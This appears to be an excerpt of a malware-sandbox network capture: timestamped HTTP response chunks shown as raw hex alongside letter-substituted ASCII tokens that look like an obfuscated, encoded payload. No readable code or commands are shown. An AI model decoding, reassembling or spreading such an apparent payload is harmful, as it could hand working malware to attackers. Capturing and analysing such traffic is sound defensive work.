                                                                                                                          2021-10-29 15:06:45 UTC1279INData Raw: 50 42 57 20 50 42 73 20 50 50 73 20 57 6b 20 57 73 20 73 42 20 50 20 7a 4f 20 50 50 4f 20 50 73 6c 20 4c 6b 20 6c 73 20 57 6b 20 4f 7a 20 57 42 20 42 7a 20 4f 55 20 50 50 4c 20 50 50 6c 20 73 55 20 50 4f 20 4f 4f 20 4f 7a 20 57 6b 20 42 6b 20 50 73 4f 20 50 6b 55 20 50 50 6c 20 50 6b 55 20 50 73 73 20 55 4c 20 55 73 20 57 6b 20 57 4f 20 55 4f 20 73 55 20 4f 4c 20 50 6b 55 20 50 50 73 20 57 42 20 4c 57 20 57 6c 20 4c 55 20 55 4f 20 55 6b 20 6c 4c 20 50 6b 55 20 50 50 73 20 57 42 20 73 55 20 55 73 20 4c 55 20 55 57 20 55 6b 20 6c 4c 20 50 6b 55 20 50 50 73 20 57 42 20 73 55 20 7a 6c 20 4c 6b 20 57 73 20 50 50 4f 20 50 50 6c 20 50 6b 4c 20 55 6c 20 57 42 20 73 4f 20 50 73 50 20 57 4f 20 7a 4f 20 50 73 6b 20 73 42 20 50 73 20 50 50 73 20 57 6b 20 57 7a 20 4c
                                                                                                                          Data Ascii: PBW PBs PPs Wk Ws sB P zO PPO Psl Lk ls Wk Oz WB Bz OU PPL PPl sU PO OO Oz Wk Bk PsO PkU PPl PkU Pss UL Us Wk WO UO sU OL PkU PPs WB LW Wl LU UO Uk lL PkU PPs WB sU Us LU UW Uk lL PkU PPs WB sU zl Lk Ws PPO PPl PkL Ul WB sO PsP WO zO Psk sB Ps PPs Wk Wz L
                                                                                                                          2021-10-29 15:06:45 UTC1280INData Raw: 20 42 7a 20 57 6b 20 73 42 20 4c 57 20 7a 4f 20 50 50 4f 20 50 50 57 20 4c 50 20 7a 57 20 57 4f 20 4f 7a 20 42 42 20 4c 6b 20 50 4f 50 20 50 50 4f 20 50 50 6c 20 50 6b 6c 20 7a 7a 20 57 42 20 4f 7a 20 57 6b 20 73 55 20 7a 6c 20 50 50 7a 20 73 42 20 50 4c 4c 20 50 50 4c 20 57 6b 20 57 4f 20 73 4f 20 57 4f 20 6c 50 20 42 42 20 50 73 42 20 50 6b 55 20 55 73 20 57 6b 20 4f 7a 20 57 6b 20 57 4f 20 7a 4f 20 50 50 4f 20 50 50 6c 20 50 50 50 20 7a 7a 20 4c 55 20 4f 7a 20 57 6b 20 4f 7a 20 4c 7a 20 4f 57 20 50 50 4c 20 50 6b 55 20 6b 20 73 42 20 73 4c 4c 20 57 6b 20 57 4f 20 7a 73 20 55 6b 20 50 73 42 20 50 6b 55 20 50 50 73 20 73 57 20 57 50 20 57 4f 20 57 50 20 55 6b 20 50 50 7a 20 50 73 4c 20 50 6b 4f 20 50 73 42 20 57 73 20 42 73 20 57 4c 20 57 42 20 55 73 20
                                                                                                                          Data Ascii: Bz Wk sB LW zO PPO PPW LP zW WO Oz BB Lk POP PPO PPl Pkl zz WB Oz Wk sU zl PPz sB PLL PPL Wk WO sO WO lP BB PsB PkU Us Wk Oz Wk WO zO PPO PPl PPP zz LU Oz Wk Oz Lz OW PPL PkU k sB sLL Wk WO zs Uk PsB PkU PPs sW WP WO WP Uk PPz PsL PkO PsB Ws Bs WL WB Us
                                                                                                                          2021-10-29 15:06:45 UTC1282INData Raw: 6c 20 50 7a 6c 20 42 6b 20 50 50 4f 20 50 50 6c 20 50 6b 7a 20 50 73 57 20 57 4c 20 57 57 20 50 7a 7a 20 55 57 20 6c 57 20 55 7a 20 4f 4f 20 50 6b 50 20 50 6b 73 20 4f 57 20 4c 73 20 73 42 20 7a 55 20 7a 4f 20 50 50 4f 20 50 73 6c 20 50 6b 42 20 50 6b 73 20 57 55 20 4c 7a 20 57 4c 20 50 7a 4f 20 42 50 20 50 73 73 20 73 57 50 20 4f 20 4f 50 20 73 42 20 55 57 20 57 6b 20 57 4f 20 55 4f 20 50 20 50 6b 73 20 50 6b 55 20 50 50 73 20 57 73 20 57 50 20 57 73 20 4c 4f 20 55 4c 20 50 73 73 20 73 42 20 6c 6c 20 50 50 73 20 57 6b 20 57 4f 20 4c 4c 20 57 6b 20 50 4c 7a 20 50 50 55 20 7a 4c 20 50 6c 55 20 50 50 73 20 4c 7a 20 73 42 20 4c 57 20 57 6b 20 50 73 42 20 50 50 4f 20 50 50 6c 20 50 6b 7a 20 55 42 20 57 6b 20 4f 7a 20 57 6b 20 57 4f 20 6c 4f 20 50 50 4f 20 50
                                                                                                                          Data Ascii: l Pzl Bk PPO PPl Pkz PsW WL WW Pzz UW lW Uz OO PkP Pks OW Ls sB zU zO PPO Psl PkB Pks WU Lz WL PzO BP Pss sWP O OP sB UW Wk WO UO P Pks PkU PPs Ws WP Ws LO UL Pss sB ll PPs Wk WO LL Wk PLz PPU zL PlU PPs Lz sB LW Wk PsB PPO PPl Pkz UB Wk Oz Wk WO lO PPO P
                                                                                                                          2021-10-29 15:06:45 UTC1283INData Raw: 20 50 50 6c 20 50 6b 55 20 50 73 73 20 6c 73 20 73 4f 20 6c 50 20 57 4f 20 7a 4f 20 50 73 6b 20 50 50 73 20 73 20 6b 20 57 6b 20 4f 7a 20 57 42 20 42 50 20 7a 42 20 50 50 42 20 6c 20 73 4f 6b 20 50 50 6c 20 57 6b 20 42 4f 20 57 4c 20 4f 55 20 73 50 7a 20 73 6c 20 55 55 20 42 55 20 50 6b 6c 20 57 6b 20 4f 7a 20 57 73 20 73 42 20 7a 73 20 50 20 4f 20 50 6b 55 20 50 50 73 20 57 42 20 6c 4f 20 57 73 20 73 7a 20 6c 50 20 42 42 20 50 73 6c 20 50 6b 55 20 73 4f 50 20 57 6b 20 4f 7a 20 57 6b 20 4c 57 20 7a 4f 20 50 50 4f 20 50 6b 6b 20 50 50 50 20 50 50 57 20 42 4f 20 50 4c 57 20 57 57 20 57 4f 20 4c 42 20 55 6b 20 7a 50 20 50 6b 55 20 50 50 73 20 57 73 20 4c 7a 20 73 42 20 42 55 20 7a 4f 20 50 50 4f 20 50 73 6c 20 50 6b 4c 20 50 50 7a 20 73 42 20 6c 6b 20 57 6b
                                                                                                                          Data Ascii: PPl PkU Pss ls sO lP WO zO Psk PPs s k Wk Oz WB BP zB PPB l sOk PPl Wk BO WL OU sPz sl UU BU Pkl Wk Oz Ws sB zs P O PkU PPs WB lO Ws sz lP BB Psl PkU sOP Wk Oz Wk LW zO PPO Pkk PPP PPW BO PLW WW WO LB Uk zP PkU PPs Ws Lz sB BU zO PPO Psl PkL PPz sB lk Wk
                                                                                                                          2021-10-29 15:06:45 UTC1284INData Raw: 20 7a 73 20 57 4f 20 7a 4f 20 50 73 6b 20 50 6b 42 20 55 6c 20 73 57 4c 20 50 6b 4f 20 4f 7a 20 57 6b 20 57 57 20 50 50 4c 20 50 42 73 20 50 4c 57 20 50 6b 55 20 50 50 73 20 57 4f 20 73 4f 20 57 20 57 4f 20 7a 4f 20 50 73 6b 20 42 20 7a 57 20 50 50 73 20 57 6b 20 57 7a 20 73 42 20 7a 7a 20 7a 4f 20 50 50 4f 20 50 73 6c 20 50 50 50 20 4c 50 20 42 42 20 4f 7a 20 57 6b 20 42 6b 20 7a 6c 20 50 50 7a 20 55 4c 20 6c 4f 20 50 50 73 20 57 6b 20 57 4f 20 55 4c 20 7a 6c 20 7a 4f 20 50 50 4f 20 50 73 6c 20 6c 50 20 50 50 73 20 57 6b 20 4f 4c 20 73 20 57 4c 20 7a 4f 20 50 50 50 20 50 50 6c 20 50 6b 55 20 50 50 73 20 4c 4c 20 4f 7a 20 57 6b 20 4c 55 20 7a 42 20 55 4f 20 50 50 4c 20 50 50 50 20 73 57 4f 20 4c 50 20 57 73 20 4c 7a 20 42 6b 20 50 4c 7a 20 55 7a 20 50 50
                                                                                                                          Data Ascii: zs WO zO Psk PkB Ul sWL PkO Oz Wk WW PPL PBs PLW PkU PPs WO sO W WO zO Psk B zW PPs Wk Wz sB zz zO PPO Psl PPP LP BB Oz Wk Bk zl PPz UL lO PPs Wk WO UL zl zO PPO Psl lP PPs Wk OL s WL zO PPP PPl PkU PPs LL Oz Wk LU zB UO PPL PPP sWO LP Ws Lz Bk PLz Uz PP
                                                                                                                          2021-10-29 15:06:45 UTC1285INData Raw: 50 73 20 50 6b 42 20 4f 6b 20 42 4f 20 50 73 4f 20 57 73 20 42 42 20 50 50 42 20 4f 55 20 7a 4f 20 73 20 55 4c 20 6c 6b 20 50 50 73 20 57 6b 20 57 7a 20 57 42 20 4f 55 20 42 6c 20 4f 73 20 50 73 42 20 50 6b 42 20 50 50 4f 20 55 4c 20 50 6c 7a 20 57 6b 20 57 4f 20 55 4f 20 6c 6c 20 4c 55 20 50 4f 42 20 50 4f 4c 20 73 6b 57 20 57 4f 20 73 4f 20 57 4f 20 7a 4f 20 50 50 4f 20 50 6b 73 20 55 4c 20 50 50 6c 20 57 6b 20 50 50 73 20 57 6b 20 57 4f 20 7a 4f 20 50 6b 6c 20 50 50 6c 20 50 6b 55 20 55 6c 20 42 57 20 50 6c 55 20 57 6b 20 57 4f 20 55 4f 20 50 73 6b 20 55 55 20 50 6b 73 20 55 50 20 73 6b 20 57 4f 20 4f 7a 20 4f 55 20 57 55 20 7a 57 20 50 50 6c 20 50 6b 55 20 50 73 73 20 4f 55 20 57 57 20 4f 55 20 7a 55 20 73 6b 7a 20 50 50 4f 20 50 50 6c 20 50 6b 4c 20
                                                                                                                          Data Ascii: Ps PkB Ok BO PsO Ws BB PPB OU zO s UL lk PPs Wk Wz WB OU Bl Os PsB PkB PPO UL Plz Wk WO UO ll LU POB POL skW WO sO WO zO PPO Pks UL PPl Wk PPs Wk WO zO Pkl PPl PkU Ul BW PlU Wk WO UO Psk UU Pks UP sk WO Oz OU WU zW PPl PkU Pss OU WW OU zU skz PPO PPl PkL
                                                                                                                          2021-10-29 15:06:45 UTC1287INData Raw: 50 20 50 73 57 20 50 50 6c 20 50 6b 55 20 50 50 4c 20 4f 50 20 6b 20 57 50 20 57 4f 20 42 57 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 6b 6c 20 57 6b 20 4f 7a 20 4c 57 20 57 73 20 4f 6c 20 50 50 73 20 50 50 6c 20 50 6b 55 20 50 50 42 20 55 4c 20 57 6b 20 57 50 20 57 4f 20 7a 73 20 50 73 6b 20 50 6c 50 20 50 6b 4f 20 7a 42 20 4c 42 20 57 7a 20 73 4c 42 20 57 4f 20 7a 73 20 7a 7a 20 50 50 6c 20 50 6b 55 20 50 50 73 20 57 50 20 4c 73 20 57 6b 20 57 4f 20 7a 4f 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 73 42 20 42 6b 20 4f 7a 20 57 57 20 57 6c 20 7a 4f 20 50 50 4f 20 50 50 42 20 50 50 7a 20 42 4f 20 4f 7a 20 4f 7a 20 4c 6c 20 57 4f 20 7a 4f 20 50 50 4f 20 50 50 6b 20 50 6b 55 20 50 50 73 20 4c 57 20 57 6b 20 6c 4c 20 57 73 20 7a 4f 20 50 50 4f 20 50 50 4c 20
                                                                                                                          Data Ascii: P PsW PPl PkU PPL OP k WP WO BW PPO PPl PkU Pkl Wk Oz LW Ws Ol PPs PPl PkU PPB UL Wk WP WO zs Psk PlP PkO zB LB Wz sLB WO zs zz PPl PkU PPs WP Ls Wk WO zO PPO PPl PkU PsB Bk Oz WW Wl zO PPO PPB PPz BO Oz Oz Ll WO zO PPO PPk PkU PPs LW Wk lL Ws zO PPO PPL
                                                                                                                          2021-10-29 15:06:45 UTC1288INData Raw: 7a 4c 20 50 50 57 20 50 50 6c 20 50 6b 6c 20 50 73 73 20 73 4c 42 20 57 4c 20 73 6b 20 4c 73 20 55 4f 20 50 6c 73 20 50 50 6c 20 50 6b 6c 20 55 6b 20 57 6b 20 4f 7a 20 57 50 20 4c 7a 20 7a 4f 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 50 73 20 57 6b 20 42 4c 20 42 50 20 57 4f 20 7a 50 20 50 73 57 20 50 50 6c 20 50 6b 55 20 50 50 4c 20 4f 50 20 6b 20 4f 7a 20 57 4f 20 42 42 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 6b 7a 20 57 6b 20 4f 7a 20 4c 57 20 57 73 20 4f 6c 20 50 50 73 20 50 50 6c 20 50 6b 55 20 50 50 42 20 4f 55 20 55 57 20 4c 42 20 57 57 20 7a 4f 20 50 50 42 20 50 73 6c 20 50 6c 55 20 50 50 6c 20 73 6b 20 4c 7a 20 57 42 20 73 4c 73 20 7a 4f 20 50 50 42 20 55 57 20 50 6b 55 20 50 50 73 20 57 50 20 4c 73 20 57 6b 20 57 4f 20 7a 4f 20 50 50 4f 20 50
                                                                                                                          Data Ascii: zL PPW PPl Pkl Pss sLB WL sk Ls UO Pls PPl Pkl Uk Wk Oz WP Lz zO PPO PPl PkU PPs Wk BL BP WO zP PsW PPl PkU PPL OP k Oz WO BB PPO PPl PkU Pkz Wk Oz LW Ws Ol PPs PPl PkU PPB OU UW LB WW zO PPB Psl PlU PPl sk Lz WB sLs zO PPB UW PkU PPs WP Ls Wk WO zO PPO P
                                                                                                                          2021-10-29 15:06:45 UTC1289INData Raw: 7a 20 57 6b 20 4f 73 20 7a 4f 20 50 50 4f 20 50 6b 6b 20 50 50 50 20 50 50 20 4f 7a 20 4f 7a 20 57 6b 20 57 6b 20 7a 6c 20 73 55 20 50 6b 73 20 50 6b 7a 20 50 50 73 20 57 73 20 57 7a 20 73 4c 42 20 57 50 20 50 50 4f 20 50 6b 6b 20 50 73 6c 20 50 6c 55 20 50 50 73 20 57 73 20 73 42 20 57 6b 20 57 4f 20 7a 57 20 55 7a 20 50 50 6c 20 50 6b 55 20 50 50 73 20 57 6b 20 4f 7a 20 57 6b 20 57 6c 20 55 50 20 50 50 4f 20 50 50 73 20 55 7a 20 50 50 73 20 57 6b 20 4f 55 20 4f 50 20 42 20 7a 42 20 50 50 4f 20 55 55 20 50 6b 55 20 50 50 73 20 57 6b 20 4f 4f 20 57 6b 20 57 4f 20 42 55 20 50 50 73 20 50 4f 20 50 50 50 20 50 50 73 20 57 6b 20 57 73 20 4f 55 20 7a 55 20 55 4f 20 50 50 57 20 50 50 6c 20 50 6b 6c 20 50 73 73 20 73 4c 42 20 57 4c 20 73 6b 20 4c 73 20 55 4f 20
                                                                                                                          Data Ascii: z Wk Os zO PPO Pkk PPP PP Oz Oz Wk Wk zl sU Pks Pkz PPs Ws Wz sLB WP PPO Pkk Psl PlU PPs Ws sB Wk WO zW Uz PPl PkU PPs Wk Oz Wk Wl UP PPO PPs Uz PPs Wk OU OP B zB PPO UU PkU PPs Wk OO Wk WO BU PPs PO PPP PPs Wk Ws OU zU UO PPW PPl Pkl Pss sLB WL sk Ls UO
                                                                                                                          2021-10-29 15:06:45 UTC1291INData Raw: 20 55 42 20 57 6b 20 4f 7a 20 57 6b 20 57 4f 20 7a 4f 20 50 50 4f 20 50 6b 4c 20 50 73 6c 20 50 50 73 20 42 73 20 42 4c 20 57 6b 20 57 4f 20 7a 57 20 50 6b 57 20 42 55 20 50 50 6b 20 50 50 73 20 4f 73 20 4f 7a 20 57 6b 20 57 4f 20 6c 55 20 50 50 4f 20 50 50 6c 20 50 73 4f 20 50 50 4f 20 6c 4c 20 57 6b 20 57 6b 20 57 4f 20 7a 6b 20 50 50 4c 20 50 50 4c 20 73 20 50 6b 57 20 57 50 20 4f 7a 20 57 73 20 4c 4c 20 55 4f 20 50 6c 73 20 50 50 73 20 6c 57 20 50 6b 73 20 57 42 20 73 4c 7a 20 57 6b 20 4f 7a 20 50 73 42 20 50 50 57 20 50 6b 50 20 50 6b 55 20 50 50 73 20 57 6b 20 4f 7a 20 57 6b 20 57 4f 20 42 55 20 55 55 20 50 50 6c 20 50 6b 4f 20 50 73 6c 20 57 6b 20 4f 7a 20 57 50 20 50 73 20 7a 42 20 50 6b 50 20 73 42 20 4c 42 20 50 50 73 20 57 6b 20 57 4f 20 4f 7a
                                                                                                                          Data Ascii: UB Wk Oz Wk WO zO PPO PkL Psl PPs Bs BL Wk WO zW PkW BU PPk PPs Os Oz Wk WO lU PPO PPl PsO PPO lL Wk Wk WO zk PPL PPL s PkW WP Oz Ws LL UO Pls PPs lW Pks WB sLz Wk Oz PsB PPW PkP PkU PPs Wk Oz Wk WO BU UU PPl PkO Psl Wk Oz WP Ps zB PkP sB LB PPs Wk WO Oz
                                                                                                                          2021-10-29 15:06:45 UTC1292INData Raw: 7a 20 57 57 20 57 4f 20 7a 4f 20 50 50 7a 20 50 50 20 50 6b 42 20 50 50 73 20 57 6b 20 57 73 20 73 42 20 73 6c 20 7a 4f 20 50 50 4f 20 50 50 57 20 42 55 20 50 55 57 20 57 50 20 4f 7a 20 57 73 20 4c 55 20 55 4f 20 50 73 6c 20 50 50 20 50 6b 50 20 50 50 73 20 57 6b 20 57 73 20 73 42 20 50 7a 55 20 7a 4f 20 50 50 4f 20 50 50 57 20 50 73 42 20 50 50 42 20 73 57 20 57 7a 20 50 7a 20 50 55 6b 20 6c 50 20 50 50 4f 20 50 50 6c 20 42 55 20 73 4c 55 20 57 6b 20 4f 7a 20 57 42 20 4c 55 20 7a 6b 20 50 50 42 20 50 73 57 20 50 73 6c 20 50 50 57 20 55 4c 20 50 7a 57 20 57 6b 20 57 4f 20 7a 73 20 55 4f 20 50 57 42 20 50 6b 6b 20 55 55 20 57 57 20 4c 4f 20 57 57 20 42 55 20 73 50 42 20 50 50 57 20 50 50 6c 20 50 6b 6c 20 7a 7a 20 50 4f 4c 20 4f 55 20 57 6b 20 4f 7a 20 6c
                                                                                                                          Data Ascii: z WW WO zO PPz PP PkB PPs Wk Ws sB sl zO PPO PPW BU PUW WP Oz Ws LU UO Psl PP PkP PPs Wk Ws sB PzU zO PPO PPW PsB PPB sW Wz Pz PUk lP PPO PPl BU sLU Wk Oz WB LU zk PPB PsW Psl PPW UL PzW Wk WO zs UO PWB Pkk UU WW LO WW BU sPB PPW PPl Pkl zz POL OU Wk Oz l
                                                                                                                          2021-10-29 15:06:45 UTC1294INData Raw: 50 50 57 20 4c 6b 20 50 50 4f 20 4f 7a 20 4f 7a 20 57 73 20 42 6b 20 6c 57 20 50 73 57 20 73 4f 7a 20 55 55 20 50 50 73 20 57 6b 20 57 6b 20 73 4c 20 4c 73 20 42 4f 20 50 4f 6b 20 50 50 57 20 57 4c 20 50 50 73 20 57 6b 20 57 4f 20 42 57 20 50 7a 4c 20 7a 4f 20 50 50 4f 20 50 50 57 20 73 6b 6c 20 7a 57 20 4c 6c 20 4c 42 20 73 6b 4f 20 4f 7a 20 50 4c 20 50 50 4f 20 50 50 6c 20 50 6b 6c 20 4c 20 50 6c 55 20 4f 7a 20 57 6b 20 4f 7a 20 73 4f 42 20 7a 6c 20 50 6b 55 20 50 73 50 20 50 4f 73 20 57 73 20 50 6b 42 20 57 6b 20 57 4f 20 7a 73 20 50 20 73 4f 4f 20 50 6b 55 20 50 50 73 20 57 73 20 50 4f 42 20 73 4c 20 4f 6c 20 42 4f 20 50 4f 6b 20 50 50 57 20 57 4f 20 50 50 73 20 57 6b 20 57 4f 20 42 57 20 50 7a 4c 20 7a 4f 20 50 50 4f 20 50 50 57 20 73 6b 6c 20 7a 57
                                                                                                                          Data Ascii: PPW Lk PPO Oz Oz Ws Bk lW PsW sOz UU PPs Wk Wk sL Ls BO POk PPW WL PPs Wk WO BW PzL zO PPO PPW skl zW Ll LB skO Oz PL PPO PPl Pkl L PlU Oz Wk Oz sOB zl PkU PsP POs Ws PkB Wk WO zs P sOO PkU PPs Ws POB sL Ol BO POk PPW WO PPs Wk WO BW PzL zO PPO PPW skl zW
                                                                                                                          2021-10-29 15:06:45 UTC1295INData Raw: 20 50 50 7a 20 57 73 20 73 6b 42 20 57 73 20 57 6b 20 7a 42 20 50 50 4f 20 50 50 57 20 4c 6b 20 73 50 4c 20 57 6b 20 4f 7a 20 57 42 20 4c 6b 20 42 7a 20 50 50 4f 20 50 50 6c 20 6c 6b 20 7a 7a 20 4c 57 20 4f 7a 20 57 6b 20 73 55 20 50 73 4f 20 73 57 6b 20 50 50 6c 20 50 6b 55 20 50 50 7a 20 73 4f 20 73 73 20 4f 55 20 57 6b 20 7a 50 20 55 6b 20 57 7a 20 50 6b 55 20 50 50 73 20 57 73 20 73 42 20 57 6b 20 57 4f 20 6c 55 20 42 42 20 50 50 4c 20 50 6b 55 20 57 6c 20 57 50 20 4f 7a 20 57 6b 20 4f 50 20 7a 4f 20 50 50 4f 20 50 6b 6b 20 50 6b 57 20 4c 20 50 55 6b 20 4f 55 20 57 6b 20 4f 7a 20 50 50 4c 20 50 20 73 50 6b 20 50 6b 55 20 50 50 73 20 57 42 20 55 57 20 55 4c 20 57 57 20 7a 4f 20 50 50 42 20 7a 6b 20 4c 6b 20 50 6b 57 20 57 6b 20 4f 7a 20 57 42 20 7a 55
                                                                                                                          Data Ascii: PPz Ws skB Ws Wk zB PPO PPW Lk sPL Wk Oz WB Lk Bz PPO PPl lk zz LW Oz Wk sU PsO sWk PPl PkU PPz sO ss OU Wk zP Uk Wz PkU PPs Ws sB Wk WO lU BB PPL PkU Wl WP Oz Wk OP zO PPO Pkk PkW L PUk OU Wk Oz PPL P sPk PkU PPs WB UW UL WW zO PPB zk Lk PkW Wk Oz WB zU
                                                                                                                          2021-10-29 15:06:45 UTC1296INData Raw: 57 6b 20 50 7a 20 7a 4f 20 50 50 4f 20 50 50 42 20 50 6b 55 20 50 50 73 20 57 6b 20 4f 7a 20 73 50 42 20 57 4f 20 7a 4f 20 50 50 4f 20 50 73 42 20 50 6b 55 20 50 50 73 20 57 6b 20 50 55 7a 20 57 6b 20 57 4f 20 7a 4f 20 50 50 4c 20 50 50 6c 20 50 6b 55 20 50 50 73 20 42 50 20 4f 7a 20 57 6b 20 57 57 20 7a 4f 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 50 73 20 57 6b 20 4f 7a 20 57 6b 20 50 50 55 20 7a 57 20 50 50 4f 20 50 50 6c 20 4f 4f 20 50 50 4c 20 57 6b 20 4f 7a 20 57 50 20 57 4f 20 7a 4f 20 50 50 4f 20 7a 50 20 50 6b 55 20 50 50 73 20 57 50 20 4f 7a 20 57 6b 20 57 4f 20 7a 4f 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 50 73 20 50 50 57 20 4f 55 20 57 6b 20 57 4f 20 73 73 20 50 50 57 20 50 50 6c 20 50 6b 55 20 50 50 6c 20 57 6b 20 4f 7a 20 57 6b 20 57 6c
                                                                                                                          Data Ascii: Wk Pz zO PPO PPB PkU PPs Wk Oz sPB WO zO PPO PsB PkU PPs Wk PUz Wk WO zO PPL PPl PkU PPs BP Oz Wk WW zO PPO PPl PkU PPs Wk Oz Wk PPU zW PPO PPl OO PPL Wk Oz WP WO zO PPO zP PkU PPs WP Oz Wk WO zO PPO PPl PkU PPs PPW OU Wk WO ss PPW PPl PkU PPl Wk Oz Wk Wl
                                                                                                                          2021-10-29 15:06:45 UTC1298INData Raw: 73 55 20 50 55 4f 20 50 6b 55 20 50 50 73 20 57 42 20 73 4f 20 50 4c 55 20 57 57 20 7a 4f 20 50 50 42 20 50 50 4c 20 42 55 20 50 57 6b 20 57 6b 20 4f 7a 20 57 73 20 4c 6b 20 73 73 6c 20 50 50 57 20 50 50 6c 20 50 6b 6c 20 55 6b 20 4c 4c 20 6b 20 42 73 20 57 4f 20 50 55 4f 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 50 73 20 57 6b 20 4f 7a 20 57 6b 20 57 6b 20 4f 73 20 50 50 6c 20 50 50 42 20 50 6b 55 20 50 50 42 20 4c 50 20 73 6b 20 4c 42 20 73 4c 6b 20 50 73 20 50 50 4f 20 50 50 6c 20 50 6b 7a 20 7a 7a 20 50 4c 7a 20 4f 7a 20 57 6b 20 42 6b 20 50 4c 73 20 50 73 42 20 50 50 6c 20 50 6b 55 20 50 50 4f 20 73 42 20 50 4c 42 20 57 6b 20 57 4f 20 55 4f 20 55 6b 20 73 6b 4f 20 50 6b 55 20 50 50 73 20 57 42 20 73 4f 20 50 4c 42 20 57 4f 20 7a 4f 20 50 73 6b 20 73
                                                                                                                          Data Ascii: sU PUO PkU PPs WB sO PLU WW zO PPB PPL BU PWk Wk Oz Ws Lk ssl PPW PPl Pkl Uk LL k Bs WO PUO PPO PPl PkU PPs Wk Oz Wk Wk Os PPl PPB PkU PPB LP sk LB sLk Ps PPO PPl Pkz zz PLz Oz Wk Bk PLs PsB PPl PkU PPO sB PLB Wk WO UO Uk skO PkU PPs WB sO PLB WO zO Psk s
                                                                                                                          2021-10-29 15:06:45 UTC1299INData Raw: 20 50 6b 55 20 50 50 7a 20 4c 57 20 57 73 20 55 4c 20 73 4f 6b 20 7a 4f 20 50 50 4f 20 50 73 6c 20 50 50 50 20 50 50 7a 20 55 4c 20 50 6b 20 57 6b 20 57 4f 20 7a 73 20 7a 6c 20 50 6b 55 20 55 4f 20 50 73 6b 20 4f 7a 20 57 50 20 57 4f 20 4c 6b 20 50 73 20 50 50 4f 20 50 50 6c 20 50 6b 6c 20 50 6b 57 20 50 20 57 4f 20 42 57 20 50 57 6c 20 7a 4f 20 50 50 4f 20 50 73 6c 20 73 4c 20 55 6b 20 57 6b 20 4f 7a 20 57 50 20 4f 73 20 7a 4f 20 50 50 4f 20 50 50 55 20 50 6b 55 20 55 6c 20 57 6b 20 4f 4f 20 4c 50 20 57 4f 20 55 6b 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 50 73 20 4f 7a 20 4f 7a 20 50 50 42 20 57 4f 20 6c 73 20 50 42 20 50 50 6c 20 55 55 20 50 50 73 20 57 6b 20 4f 7a 20 57 6b 20 50 6c 42 20 7a 42 20 55 6b 20 50 6c 50 20 50 6b 55 20 50 50 73 20 57 73 20
                                                                                                                          Data Ascii: PkU PPz LW Ws UL sOk zO PPO Psl PPP PPz UL Pk Wk WO zs zl PkU UO Psk Oz WP WO Lk Ps PPO PPl Pkl PkW P WO BW PWl zO PPO Psl sL Uk Wk Oz WP Os zO PPO PPU PkU Ul Wk OO LP WO Uk PPO PPl PkU PPs Oz Oz PPB WO ls PB PPl UU PPs Wk Oz Wk PlB zB Uk PlP PkU PPs Ws
                                                                                                                          2021-10-29 15:06:45 UTC1300INData Raw: 55 4c 20 7a 50 20 7a 57 20 50 50 4f 20 50 50 57 20 42 55 20 50 73 57 20 57 6b 20 4f 7a 20 57 73 20 7a 55 20 50 57 6c 20 50 50 4f 20 50 50 6c 20 50 6b 4c 20 50 50 4f 20 57 73 20 55 57 20 6c 20 57 4f 20 7a 4f 20 50 50 42 20 7a 6b 20 50 50 6c 20 42 6c 20 57 7a 20 57 6b 20 4f 55 20 57 6b 20 50 73 4f 20 50 7a 20 50 50 6c 20 50 6b 55 20 50 50 7a 20 4f 4c 20 4c 20 57 73 20 42 55 20 73 57 57 20 50 50 4f 20 50 50 6c 20 50 6b 4c 20 50 6b 20 73 4f 20 50 4f 73 20 4f 55 20 7a 55 20 6c 20 50 50 57 20 50 50 6c 20 50 6b 6c 20 55 73 20 73 6b 20 57 6b 20 4f 55 20 7a 55 20 57 57 20 50 50 57 20 50 50 6c 20 50 6b 6c 20 7a 7a 20 50 7a 55 20 4f 7a 20 57 6b 20 4f 7a 20 57 55 20 4f 7a 20 50 50 6c 20 50 6b 55 20 50 50 7a 20 73 4c 20 4f 6b 20 50 20 42 73 20 7a 42 20 50 50 4c 20 50
                                                                                                                          Data Ascii: UL zP zW PPO PPW BU PsW Wk Oz Ws zU PWl PPO PPl PkL PPO Ws UW l WO zO PPB zk PPl Bl Wz Wk OU Wk PsO Pz PPl PkU PPz OL L Ws BU sWW PPO PPl PkL Pk sO POs OU zU l PPW PPl Pkl Us sk Wk OU zU WW PPW PPl Pkl zz PzU Oz Wk Oz WU Oz PPl PkU PPz sL Ok P Bs zB PPL P
                                                                                                                          2021-10-29 15:06:45 UTC1302INData Raw: 20 6c 6c 20 50 50 6c 20 50 6b 55 20 50 50 7a 20 73 6b 20 57 6b 20 4c 6c 20 50 7a 6c 20 50 73 6c 20 50 50 4f 20 50 50 6c 20 50 50 50 20 7a 57 20 4c 42 20 42 6c 20 50 57 57 20 57 4f 20 7a 4f 20 50 50 42 20 73 50 57 20 42 55 20 73 57 4c 20 57 6b 20 4f 7a 20 57 73 20 7a 55 20 73 50 20 50 50 4f 20 50 50 6c 20 50 6b 6c 20 7a 42 20 73 4f 20 4f 7a 20 57 6b 20 57 4f 20 6c 50 20 42 42 20 50 50 73 20 50 6b 55 20 50 55 73 20 57 50 20 4f 7a 20 57 6b 20 50 55 20 7a 4f 20 50 50 4f 20 50 6b 6b 20 50 50 50 20 7a 7a 20 50 7a 4f 20 4f 7a 20 57 6b 20 4f 7a 20 4c 55 20 50 50 55 20 50 50 55 20 50 6b 55 20 50 50 7a 20 57 42 20 4f 6c 20 42 50 20 50 7a 6c 20 55 6b 20 50 50 4f 20 50 50 6c 20 50 50 50 20 7a 57 20 4c 42 20 4c 42 20 73 6b 4f 20 4f 7a 20 4c 7a 20 50 50 4f 20 50 50 6c
                                                                                                                          Data Ascii: ll PPl PkU PPz sk Wk Ll Pzl Psl PPO PPl PPP zW LB Bl PWW WO zO PPB sPW BU sWL Wk Oz Ws zU sP PPO PPl Pkl zB sO Oz Wk WO lP BB PPs PkU PUs WP Oz Wk PU zO PPO Pkk PPP zz PzO Oz Wk Oz LU PPU PPU PkU PPz WB Ol BP Pzl Uk PPO PPl PPP zW LB LB skO Oz Lz PPO PPl
